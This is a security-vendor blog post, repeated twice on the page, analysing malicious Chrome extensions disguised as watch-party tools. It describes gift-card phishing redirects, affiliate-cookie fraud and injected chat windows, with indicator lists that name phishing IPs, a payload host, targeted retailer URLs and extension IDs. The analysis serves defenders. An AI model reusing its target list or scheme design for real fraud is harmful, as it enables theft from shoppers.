Come Join the Scam Party

Authored by Oliver Devane, Vallabh Chole, and Aayush Tyagi

McAfee has recently observed several malicious Chrome Extensions which, once installed, will redirect users to phishing sites, insert Affiliate IDs and modify legitimate websites to exfiltrate personally identifiable information (PII) data. According to the Google Extension Chrome Store, the combined install base is 80,000

One extension, ‘Netflix Party’, mimics the original Netflix Party extension, which allows groups of people to watch Netflix shows at the same time. However, this version monitors all the websites you visit and performs several malicious activities.

The malicious actor behind the extensions has created several Twitter accounts and fake review websites to deceive users into trusting and installing the extensions.

The victim will be tricked into installing the extension and their data will be stolen when browsing a gift card site.

The details of each step are as follows:

  1. The perpetrator creates malicious extensions and adds them to the Chrome Extension Store. They create fake websites to review the extensions and fake Twitter accounts to publicize them.
  2. A victim may perform a web or Twitter search for Netflix Party, read the review and click on a link that will lead them to the Google Chrome Store.
  3. They click to install the Extension and accept the permissions.
  4. The victim will either perform a web search or directly navigate to the gift card website. The Extension will identify the website and redirect them to the phishing page.
  5. The victim will enter their gift card information on the phishing page.
  6. The gift card information is posted to the server to which the malicious actor has access. They can now use or sell the stolen data and the victim will lose their funds.

Technical Analysis

This section contains the technical analysis of the malicious chrome extension “bncibciebfeopcomdaknelhcohiidaoe“.

Manifest.json

The manifest.json file contains the permissions of the extension. The ‘unsafe-eval’ permission in the ‘content_security_policy’ and the allowed use of content.js on any website visited by the user is of particular concern

Background.js

When the extension is installed, the background.js script will be loaded. This file uses a simple obfuscation technique of putting all the code on one line which makes it difficult to read. This is easily cleaned up by using a code beautifier and the image below shows the obfuscated script on the first line and the cleaned-up code below the red arrow.

This script accesses https: // accessdashboard[.]live to download a script and store it as variable ‘code’ in Chromes local storage. This stored variable is then referenced in the content.js script, which is executed on every visited website.

Content.js

After beautification, we see the code will read the malicious script from the ‘code’ variable which was previously stored.

‘Code’

The malicious code has three main functions, redirection for phishing, modifying cookies to add AffiliateIDs, and modifying website code to add chat windows.

Redirection for Phishing

Redirection for phishing works by checking if the URL being accessed matches a list, and conditionally redirects to a malicious IP that hosts the phishing site.

URLs monitored are:

  • https[:]//www.target.com/guest/gift-card-balance
  • https[:]//www.macys.com/account/giftcardbalance
  • https[:]//www.nike.com/orders/gift-card-lookup
  • https[:]//www.nordstrom.com/nordstrom-gift-cards
  • https[:]//www.sephora.com/beauty/giftcards
  • https[:]//www.sephoragiftcardbalance.com
  • https[:]//balance.amexgiftcard.com
  • https[:]//prepaidbalance.americanexpress.com/GPTHBIWeb/validateIPAction.do?clientkey=retail%20sales%20channel
  • https[:]//amexprepaidcard.com
  • [:]//secure4.store.apple.com/shop/giftcard/balance

Upon navigating to one of the above sites, the user will be redirected to 164[.]90[.]144[.]88. An observant user would notice that the URL would have changed to an IP address, but some users may not.

The image below shows the Apple Phishing site and the various phishing kits being hosted on this server.

The phishing sites share similar codes. If a user enters their gift card information, the data will be posted to 52.8.106.52. A network capture of the post request is shown below:

Modifying cookies to add AffiliateIDs

The second malicious function contains AIPStore which is a dictionary containing a list of URLs and their respective monetizing sites which provide affiliate IDs. This function works by loading new tabs which will result in cookies being set on the visited sites. The flow below describes how the extension will work.

  1. A user navigates to a retail website
  2. If the retail website is contained in the AIPStore keymap, the extension will load a new tab with a link to a monetizing site which sets the cookie with the affiliate ID. The new tab is then closed, and the cookie will persist.
  3. The user will be unaware that a cookie would have been set and they will continue to browse the website.
  4. Upon purchasing any goods, the Affiliate ID will be recognized by the site vendor and commission will be sent to the Affiliate ID owner which would be the Malicious Actor

The left image below shows the original site with no affiliate cookie, the one on the right highlights the cookie that has been added by the extension.

Chat Windows

The final function checks a list of URLs being accessed and if they match, a JS script will be injected into the HTML code which will result in a chat window being displayed. The image below shows the injected script and the chat window.

The chat window may be used by the malicious actor to request PII data, credit card, and product key information.

Conclusion

This threat is a good example of the lengths malicious actors will go to trick users into installing malware such as creating Twitter accounts and fake review websites.

McAfee advises its customers to be cautious when installing Chrome Extensions and pay attention to the permissions that they are requesting.

The permissions will be shown by Chrome before the installation of the Extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.

The Malicious code within the extension is detected as Phish-Extension. Please perform a ‘Full’ scan via the product.

Type Value Product Detected
URL – Phishing Sites 164.90.141.88/* McAfee WebAdvisor Blocked
Chrome Extension netflix party – bncibciebfeopcomdaknelhcohiidaoe Total Protection and LiveSafe Phish-Extension
Chrome Extension teleparty – flddpiffdlibegmclipfcnmaibecaobi Total Protection and LiveSafe Phish-Extension
Chrome Extension hbo-max-watch-party – dkdjiiihnadmgmmfobidmmegidmmjobi Total Protection and LiveSafe Phish-Extension
Chrome Extension prime-watch-party – hhllgokdpekfchhhiknedpppjhgicfgg Total Protection and LiveSafe Phish-Extension
Chrome Extension private-watch-party – maolinhbkonpckjldhnocgilkabpfodc Total Protection and LiveSafe Phish-Extension
Chrome Extension hotstar-ad-blocker – hacogolfhplehfdeknkjnlblnghglfbp Total Protection and LiveSafe Phish-Extension
Chrome Extension hbo-ad-blocker – cbchmocclikhalhkckeiofpboloaakim Total Protection and LiveSafe Phish-Extension
Chrome Extension blocksite – pfhjfcifolioiddfgicgkapbkfndaodc Total Protection and LiveSafe Phish-Extension
Chrome Extension hbo-enhanced – pkdpclgpnnfhpapcnffgjbplfbmoejbj Total Protection and LiveSafe Phish-Extension
Chrome Extension hulu-watch-party – hkanhigmilpgifamljmnfppnllckkpda Total Protection and LiveSafe Phish-Extension
Chrome Extension disney-plus-watch-party – flapondhpgmggemifmemcmicjodpmkjb Total Protection and LiveSafe Phish-Extension
Chrome Extension spotify-ad-blocker – jgofflaejgklikbnoefbfmhfohlnockd Total Protection and LiveSafe Phish-Extension
Chrome Extension ott-party – lldibibpehfomjljogedjhaldedlmfck Total Protection and LiveSafe Phish-Extension

Source

Authored by Oliver Devane, Vallabh Chole, and Aayush Tyagi

McAfee has recently observed several malicious Chrome Extensions which, once installed, will redirect users to phishing sites, insert Affiliate IDs and modify legitimate websites to exfiltrate personally identifiable information (PII) data. According to the Google Extension Chrome Store, the combined install base is 80,000

One extension, ‘Netflix Party’, mimics the original Netflix Party extension, which allows groups of people to watch Netflix shows at the same time. However, this version monitors all the websites you visit and performs several malicious activities.

The malicious actor behind the extensions has created several Twitter accounts and fake review websites to deceive users into trusting and installing the extensions.

The victim will be tricked into installing the extension and their data will be stolen when browsing a gift card site.

The details of each step are as follows:

  1. The perpetrator creates malicious extensions and adds them to the Chrome Extension Store. They create fake websites to review the extensions and fake Twitter accounts to publicize them.
  2. A victim may perform a web or Twitter search for Netflix Party, read the review and click on a link that will lead them to the Google Chrome Store.
  3. They click to install the Extension and accept the permissions.
  4. The victim will either perform a web search or directly navigate to the gift card website. The Extension will identify the website and redirect them to the phishing page.
  5. The victim will enter their gift card information on the phishing page.
  6. The gift card information is posted to the server to which the malicious actor has access. They can now use or sell the stolen data and the victim will lose their funds.

Technical Analysis

This section contains the technical analysis of the malicious chrome extension “bncibciebfeopcomdaknelhcohiidaoe“.

Manifest.json

The manifest.json file contains the permissions of the extension. The ‘unsafe-eval’ permission in the ‘content_security_policy’ and the allowed use of content.js on any website visited by the user is of particular concern

Background.js

When the extension is installed, the background.js script will be loaded. This file uses a simple obfuscation technique of putting all the code on one line which makes it difficult to read. This is easily cleaned up by using a code beautifier and the image below shows the obfuscated script on the first line and the cleaned-up code below the red arrow.

This script accesses https: // accessdashboard[.]live to download a script and store it as variable ‘code’ in Chromes local storage. This stored variable is then referenced in the content.js script, which is executed on every visited website.

Content.js

After beautification, we see the code will read the malicious script from the ‘code’ variable which was previously stored.

‘Code’

The malicious code has three main functions, redirection for phishing, modifying cookies to add AffiliateIDs, and modifying website code to add chat windows.

Redirection for Phishing

Redirection for phishing works by checking if the URL being accessed matches a list, and conditionally redirects to a malicious IP that hosts the phishing site.

URLs monitored are:

  • https[:]//www.target.com/guest/gift-card-balance
  • https[:]//www.macys.com/account/giftcardbalance
  • https[:]//www.nike.com/orders/gift-card-lookup
  • https[:]//www.nordstrom.com/nordstrom-gift-cards
  • https[:]//www.sephora.com/beauty/giftcards
  • https[:]//www.sephoragiftcardbalance.com
  • https[:]//balance.amexgiftcard.com
  • https[:]//prepaidbalance.americanexpress.com/GPTHBIWeb/validateIPAction.do?clientkey=retail%20sales%20channel
  • https[:]//amexprepaidcard.com
  • [:]//secure4.store.apple.com/shop/giftcard/balance

Upon navigating to one of the above sites, the user will be redirected to 164[.]90[.]144[.]88. An observant user would notice that the URL would have changed to an IP address, but some users may not.

The image below shows the Apple Phishing site and the various phishing kits being hosted on this server.

The phishing sites share similar codes. If a user enters their gift card information, the data will be posted to 52.8.106.52. A network capture of the post request is shown below:

Modifying cookies to add AffiliateIDs

The second malicious function contains AIPStore which is a dictionary containing a list of URLs and their respective monetizing sites which provide affiliate IDs. This function works by loading new tabs which will result in cookies being set on the visited sites. The flow below describes how the extension will work.

  1. A user navigates to a retail website
  2. If the retail website is contained in the AIPStore keymap, the extension will load a new tab with a link to a monetizing site which sets the cookie with the affiliate ID. The new tab is then closed, and the cookie will persist.
  3. The user will be unaware that a cookie would have been set and they will continue to browse the website.
  4. Upon purchasing any goods, the Affiliate ID will be recognized by the site vendor and commission will be sent to the Affiliate ID owner which would be the Malicious Actor

The left image below shows the original site with no affiliate cookie, the one on the right highlights the cookie that has been added by the extension.

Chat Windows

The final function checks a list of URLs being accessed and if they match, a JS script will be injected into the HTML code which will result in a chat window being displayed. The image below shows the injected script and the chat window.

The chat window may be used by the malicious actor to request PII data, credit card, and product key information.

Conclusion

This threat is a good example of the lengths malicious actors will go to trick users into installing malware such as creating Twitter accounts and fake review websites.

McAfee advises its customers to be cautious when installing Chrome Extensions and pay attention to the permissions that they are requesting.

The permissions will be shown by Chrome before the installation of the Extension. Customers should take extra steps to verify the authenticity if the extension is requesting permissions that enable it to run on every website you visit such as the one detailed in this blog

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.

The Malicious code within the extension is detected as Phish-Extension. Please perform a ‘Full’ scan via the product.

Type Value Product Detected
URL – Phishing Sites 164.90.141.88/* McAfee WebAdvisor Blocked
Chrome Extension netflix party – bncibciebfeopcomdaknelhcohiidaoe Total Protection and LiveSafe Phish-Extension
Chrome Extension teleparty – flddpiffdlibegmclipfcnmaibecaobi Total Protection and LiveSafe Phish-Extension
Chrome Extension hbo-max-watch-party – dkdjiiihnadmgmmfobidmmegidmmjobi Total Protection and LiveSafe Phish-Extension
Chrome Extension prime-watch-party – hhllgokdpekfchhhiknedpppjhgicfgg Total Protection and LiveSafe Phish-Extension
Chrome Extension private-watch-party – maolinhbkonpckjldhnocgilkabpfodc Total Protection and LiveSafe Phish-Extension
Chrome Extension hotstar-ad-blocker – hacogolfhplehfdeknkjnlblnghglfbp Total Protection and LiveSafe Phish-Extension
Chrome Extension hbo-ad-blocker – cbchmocclikhalhkckeiofpboloaakim Total Protection and LiveSafe Phish-Extension
Chrome Extension blocksite – pfhjfcifolioiddfgicgkapbkfndaodc Total Protection and LiveSafe Phish-Extension
Chrome Extension hbo-enhanced – pkdpclgpnnfhpapcnffgjbplfbmoejbj Total Protection and LiveSafe Phish-Extension
Chrome Extension hulu-watch-party – hkanhigmilpgifamljmnfppnllckkpda Total Protection and LiveSafe Phish-Extension
Chrome Extension disney-plus-watch-party – flapondhpgmggemifmemcmicjodpmkjb Total Protection and LiveSafe Phish-Extension
Chrome Extension spotify-ad-blocker – jgofflaejgklikbnoefbfmhfohlnockd Total Protection and LiveSafe Phish-Extension
Chrome Extension ott-party – lldibibpehfomjljogedjhaldedlmfck Total Protection and LiveSafe Phish-Extension

Source

More from author

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Related posts

Advertismentspot_img

Latest posts

Apple patches double zero-day in browser and kernel – update now! – Naked Security

Apple just pushed out an emergency update for two zero-day bugs that are apparently actively being exploited. There's a remote code execution hole (RCE) dubbed...

Securing the ever-evolving hybrid work environment

Even as many business leaders debate the boundaries of remote work styles and schedules, there is little doubt that hybrid work will persist for...

Hackers Deploy Bumblebee Loader to Breach Target Networks

Threat actors associated with BazarLoader, TrickBot and IcedID malware are now increasingly deploying the loader known as Bumblebee to breach target networks and subsequently...

Want to stay up to date with the latest news?

We would love to hear from you! Please fill in your details and we will stay in touch. It's that simple!